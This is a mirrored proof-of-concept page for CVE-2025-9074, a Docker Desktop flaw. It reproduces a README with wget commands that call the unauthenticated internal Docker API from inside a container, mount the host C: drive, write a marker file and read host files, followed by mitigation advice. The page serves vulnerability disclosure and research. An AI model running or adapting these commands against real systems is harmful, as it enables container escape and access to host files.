Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-9074 PoC — Docker Desktop 安全漏洞

Source
https://github.com/pucagit/CVE-2025-9074
Associated Vulnerability
Title:Docker Desktop 安全漏洞 (CVE-2025-9074)
Description:Docker Desktop是美国Docker公司的一个基于容器技术的用于轻量化部署应用的桌面软件。该产品可提供桌面环境可支持在Linux/Windows/Mac OS系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 Docker Desktop存在安全漏洞,该漏洞源于本地Linux容器可访问Docker Engine API,可能导致执行特权命令。
Readme
# CVE-2025-9074 – Full Docker Escape on Windows & macOS Docker Desktop

## 📌 Description
A flaw in Docker Desktop’s internal HTTP API allowed containers to reach the service without authentication or access controls.  
This enabled the creation of new containers with host volumes mounted, giving read/write access to the host file system.

## 📝 References
- [CVE-2025-9074 Record](https://www.cve.org/CVERecord?id=CVE-2025-9074)  
- [Docker Desktop Release Notes](https://docs.docker.com/desktop/release-notes/#4443)  
- [Felix Boulet’s Research](https://blog.qwertysecurity.com/Articles/blog3.html)  

## 🎯 Affected Versions
- Docker Desktop **≤ 4.44.3** on Windows and macOS

## ⚙️ Proof of Concept (PoC)

### Requirements
- Docker Desktop prior to **4.44.3**  
- Running under a user with privileges matching the targeted mounted folder  

### Steps to Reproduce
1. On Windows, create a `C:\test` folder with a sample file (e.g., `readme.txt`).  
   ![poc 1](poc_1.png)  

2. Launch a simple container (e.g., `alpine` using `docker run -it alpine '/bin/sh'`) and run:
    ```sh
    # Create container with host volume mounted
    wget --header='Content-Type: application/json' \
      --post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /host_root/test/pwn.txt"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
      -O - http://192.168.65.7:2375/containers/create > create.json

    # Extract container ID
    cid=$(cut -d'"' -f4 create.json)

    # Start container
    wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
    ```

   **Explanation**:  
   - The POST request creates a container mounting `C:\` into `/host_root`, then writes `pwn.txt`.  
   - The container ID is parsed from the response.  
   - A second POST request starts the container.  

3. To read files, request an archive from the container:
    ```sh
    wget http://192.168.65.7:2375/containers/$cid/archive?path=/host_root/test -O test.tar
    tar -xvf test.tar
    cat test/readme.txt
    ```
   **Explanation**:  
   - The GET request fetches an archive of the host-mounted directory.  
   - Extracting it reveals host files accessible inside the container.  

### Expected Result
1. `C:\test\pwn.txt` is created from within the container.  
   ![poc 2](poc_2.png)  
2. The container can read host files such as `C:\test\readme.txt`.  
   ![poc 3](poc_3.png)  

⚠️ **Note**: This PoC demonstrates the vulnerability safely and does not include weaponized exploit code.

## 🛡️ Mitigation
- For Windows and Mac users, **upgrade** to Docker Desktop **≥ 4.44.3**  

## ⚠️ Disclaimer
This PoC is for **educational and research purposes only**. The author assumes **no liability for misuse**. 

---

## 🙏 Attribution
This PoC and README are **derived from research by [Felix Boulet](https://blog.qwertysecurity.com/Articles/blog3.html)**.  
All credit for the original discovery and analysis belongs to the original author.  

---

## 📜 License
This project is licensed under the [MIT License](LICENSE).
File Snapshot

 [4.0K]  /data/pocs/e2138b699c2c6d0c02dbc1a5d2cba25446ed4db6
├── [1.0K]  LICENSE
├── [ 27K]  poc_1.png
├── [ 18K]  poc_2.png
├── [ 20K]  poc_3.png
└── [3.0K]  README.md

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.